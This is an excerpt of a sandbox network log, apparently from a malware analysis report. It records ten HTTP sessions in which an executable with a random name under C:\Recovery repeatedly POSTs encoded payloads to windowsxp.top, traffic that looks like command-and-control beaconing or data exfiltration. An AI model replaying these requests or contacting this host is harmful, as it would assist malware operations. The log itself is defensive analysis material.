                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:09.352454901 CET1008OUTData Raw: 50 57 58 5d 5e 5a 56 52 54 58 57 54 54 55 5b 5b 59 5d 5b 5b 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX]^ZVRTXWTTU[[Y][[RSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1<_6:!$[-'?'8$V/=8*P4T /[4=,=9?!Y##X('
Oct 27, 2024 19:23:09.623476982 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:09.838660002 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDRW5%2F96Coy6vebxbvRv9V%2FaDaJt6k1P0kbxu8XZ60XtGxTSgQL1gDG2ek5WAvn1qDrB1SeNIaSF5%2F6gtrT7nPN0KJfVzffL4d8m7e8U4VzJkIhWbBIf0Fi3%2F3HokDeA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b734b88ee83f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=860368&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49830 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:09.976233006 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:10.323093891 CET1012OUTData Raw: 50 52 58 55 5e 52 53 54 54 58 57 54 54 52 5b 53 59 5c 5b 5c 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXU^RSTTXWTTR[SY\[\RTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2>/ 9!_!,433;?;,V)Y?4T?_/'_=-9!Y##X(
Oct 27, 2024 19:23:10.587162018 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:10.895071030 CET | 765 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZZfiVOSRd1gDwb3yCJwjalOk2Y19DDfEpiY06p4UPtE8Ca6z7F5ncRqNUBCPcGEGd8CALNspNs4Rl3XHAlpGDb3P8%2BgVL7ptiMzsDa%2FuuekYi6ScOx2Ref8mJaoS0nI"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b73aca86e956-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1108728&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
Oct 27, 2024 19:23:10.895195961 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49836 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:11.026158094 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:11.383944035 CET1012OUTData Raw: 50 56 58 5e 5b 5f 56 56 54 58 57 54 54 52 5b 5d 59 5c 5b 58 52 55 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX^[_VVTXWTTR[]Y\[XRURXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z1/5=\!%89 \$8#8.+=< 1?8?*?=./!Y##X(
Oct 27, 2024 19:23:11.624330997 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:11.921108007 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2Fd2p%2FupKY7uals%2FKrywpZwMpU%2FH57l9WtHZnwu3vnonq8DMyLootxTszXjGhlOLRauPMgGsDecusJPFKJxz5QoGT1ONCvjFmADyFJwpi8Kd3DJtcWIdHoOKv%2FDX3VOo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7414ee7a916-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1533&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=977717&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49842 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:12.045836926 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:12.399913073 CET1012OUTData Raw: 50 56 58 59 5b 59 56 51 54 58 57 54 54 51 5b 52 59 51 5b 51 52 56 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXY[YVQTXWTTQ[RYQ[QRVRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%=06=^55$\9$ Q,.*4T"2;Y-=?/99!Y##X(3
Oct 27, 2024 19:23:12.657399893 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:12.973592043 CET | 773 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1NIQsveQ7VAU6DT%2Fu8q%2FXTDAHBORG5otcMugUSQ1DhhKMrgQ3TzjX5CVFPbs79QA%2BC0RbW79aRl2c4FrieWhVhz36uxlwFXab5wp0jNVFtIpnYo41zahxohgstXHCi6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b747ba8d3ab5-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1228159&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49848 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:13.119216919 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:13.591770887 CET1012OUTData Raw: 55 50 58 59 5b 58 56 54 54 58 57 54 54 50 5b 5a 59 5f 5b 5b 52 52 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXY[XVTTXWTTP[ZY_[[RRR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.'!*=!(_.0Y$<->(W*T#23Y;>7=<9:!Y##X(7
Oct 27, 2024 19:23:13.713222027 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:13.930025101 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rh6iRbFpamiPTzOK%2BTXE8K7W8t339Xo%2BlateRMyRR%2FjV6VEyLahZ6rbJww23dkVQj15abglU8wc8TanRiy94rDaZLo5d80Rf828oeXbWpdPfLaK%2FXEyAh5mk%2FwRcFjmQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b74e5e742cc6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1382&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1081404&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
Oct 27, 2024 19:23:13.930042028 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  35 | 192.168.2.4 | 49854 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:14.058545113 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:14.414833069 CET | 1012 | OUT
                                                                                                                  Oct 27, 2024 19:23:14.727269888 CET | 1012 | OUT
                                                                                                                  Oct 27, 2024 19:23:14.772861958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:15.075289965 CET | 769 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jrjgDzJ%2BQYfBjOiVHuUPapBPyyJL4k5R3lGCZSJrtLBZUHK5ORygpA4IUiMQ1XNFBkNPLOkHh6i%2B786lUBFlabcQys5XvVUMIDx3ZG%2BLIPCczoZ%2FrOfphJqSCgqj3zAb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b754490b46e6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1147385&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:15.075309038 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  36 | 192.168.2.4 | 49860 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:14.773761034 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:15.126722097 CET | 1716 | OUT
                                                                                                                  Oct 27, 2024 19:23:15.362649918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:15.561651945 CET | 913 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vw0hNXSpHCGxjezVL%2Foza34qzUMbsk5xW6jCib80GTg6jY3i8jRAaXYTth0%2Bt434afsrVjPeoj3yRerEgQ6IfBdCOtln8ks8vEx1PIGdBAQFb5JnO1B5zrgDnrQ1ZGpg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b758a8eec872-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=970509&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Oct 27, 2024 19:23:15.561666012 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  37 | 192.168.2.4 | 49866 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:15.199466944 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:15.555471897 CET | 1008 | OUT
                                                                                                                  Oct 27, 2024 19:23:15.811698914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:16.031846046 CET | 780 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2sjTPkNYGLfG%2FhuCOiZ7Y0NdhBt0HxXIE%2FBwtyevitLBh%2BanRjAVIIdXjpvYfoJ2D1MSLtbwxXu85%2BbrkNL2%2FRYj0NCoTtM9ENnou%2Frc3eyEwtrMqV1YiHHLA22VI0g"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b75b7bc6e786-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1092006&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  38 | 192.168.2.4 | 49872 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:16.433196068 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:16.789941072 CET | 1012 | OUT
                                                                                                                  Oct 27, 2024 19:23:17.037880898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:17.263052940 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMfs7rs%2FXQrlDDHeY5lb4WoN7760Q7eumwrK8HYJfQRGMSbkkMZNXm2UToDn%2BwMiav%2Fm4A8rklXpXOdB4wB0UOT0bczRjoCwIqLy6p1oSMs8bgQGFnlDmKiGdn3uEhUa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b76319f6e7db-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  39 | 192.168.2.4 | 49878 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:17.398598909 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:17.742999077 CET | 1012 | OUT
                                                                                                                  Oct 27, 2024 19:23:17.987400055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:18.338105917 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2UE6hlZuX8vO%2FqskRvMAWmTKTD60%2BJFbyV9nU9mHoe5xCIoRVdb%2F6YgBjfHtu%2BM3dEr8QdNZefPRIEDsl9D3O5Cq2PMtkv%2B2ssO2xm54BbGLA2kGC3omFQS68zyGWR8n"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7690b232caa-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1066273&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  40 | 192.168.2.4 | 49884 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:18.475924969 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:18.823627949 CET | 1012 | OUT
                                                                                                                  Oct 27, 2024 19:23:19.080559969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:19.385049105 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FARBsRq4fmhtlSszxF50F2V62pPvkmYg%2BclWrR6VGwpCYt1N5pATMMHEKuCi%2B4vN7Dl7tcL8hH5LQ3kMb1xm%2Fr89l5OrlS6MC4Z%2Fd8ISDVkqmr2eiryLDKkwNEhRL%2Fmc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b76fd922eaa0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
